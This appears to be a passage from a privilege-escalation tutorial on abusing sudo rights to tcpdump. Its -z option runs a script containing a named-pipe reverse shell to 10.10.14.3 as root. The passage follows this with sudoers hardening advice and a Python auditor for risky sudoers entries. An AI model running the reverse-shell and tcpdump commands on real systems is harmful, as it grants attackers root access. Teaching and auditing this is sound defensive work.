```shell
man tcpdump

<SNIP>
       -z postrotate-command
              Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.
```

```shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
```

```shell
cat /tmp/.test

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f
```

```shell
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
```

AppArmor in more recent distributions has predefined the commands used with the postrotate-command, effectively preventing command execution.

Two best practices that should always be considered when provisioning `sudo` rights:
- Always specify the absolute path to any binaries listed in the `sudoers` file entry. Otherwise, an attacker may be able to leverage PATH abuse (which we will see in the next section) to create a malicious binary that will be executed when the command runs (i.e., if the `sudoers` entry specifies `cat` instead of `/bin/cat`, this could likely be abused).
- Grant `sudo` rights sparingly and based on the principle of least privilege. Does the user need full `sudo` rights? Can they still perform their job with one or two entries in the `sudoers` file? Limiting the privileged commands that a user can run will greatly reduce the likelihood of successful privilege escalation.
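The two practices above can be checked mechanically. The following is an added example (not code from the original page) that parses `sudoers` user specifications and `Cmnd_Alias` lines and flags three things: a command of `ALL`, a command given without an absolute path, and a binary such as `tcpdump` whose `-z` flag runs a caller-supplied command. The `SAMPLE` text and the `SPAWNERS` list are constructed for the example.

```python
import re

# Tags that may prefix a command in a sudoers user specification (sudoers(5)).
TAG_RE = re.compile(r"^(?:NO)?(?:PASSWD|EXEC|SETENV|LOG_INPUT|LOG_OUTPUT|MAIL|FOLLOW):\s*")
# Binaries the text shows running a caller-supplied command from a flag (tcpdump -z); extend this.
SPAWNERS = {"tcpdump"}

def split_commands(rhs):
    """Reduce the text after '=' to the first token of each listed command."""
    rhs = re.sub(r"^\([^)]*\)\s*", "", rhs.strip())  # drop the (runas) group
    tokens = []
    for item in rhs.split(","):
        item = item.strip()
        while (m := TAG_RE.match(item)):       # strip NOPASSWD:, SETENV:, ...
            item = item[m.end():]
        if item and not item.startswith("!"):  # a negated entry is not a grant
            tokens.append(item.split()[0])
    return tokens

def audit_sudoers(text):
    """Return (line_no, command, reason) for entries that break the two practices."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("#", "@include", "Defaults")):
            continue
        head, sep, rhs = line.partition("=")
        if not sep or not head.split() or re.match(r"(?!Cmnd_)\w+_Alias", head):
            continue  # User_/Host_/Runas_Alias lines carry no commands
        for cmd in split_commands(rhs):
            if cmd == "ALL":
                findings.append((n, cmd, "ALL grants every command: not least privilege"))
            elif cmd == "sudoedit" or re.fullmatch(r"[A-Z][A-Z0-9_]*", cmd):
                continue  # built-in, or a Cmnd_Alias audited where it is defined
            elif not cmd.startswith("/"):
                findings.append((n, cmd, "relative path: open to PATH abuse"))
            elif cmd.rsplit("/", 1)[-1] in SPAWNERS:
                findings.append((n, cmd, "flag can run a caller-chosen command (-z)"))
    return findings

# Constructed sample sudoers content, not taken from any real host.
SAMPLE = """\
# constructed sample
Defaults env_reset
Cmnd_Alias NET = /usr/sbin/tcpdump
%sudo ALL=(ALL:ALL) ALL
alice ALL=(root) NOPASSWD: cat /var/log/syslog
bob ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, NET
carol ALL=(ALL) sudoedit /etc/hosts
"""
```

Run `audit_sudoers(open("/etc/sudoers").read())` as root to review a real file; files under `/etc/sudoers.d/` need to be passed in the same way.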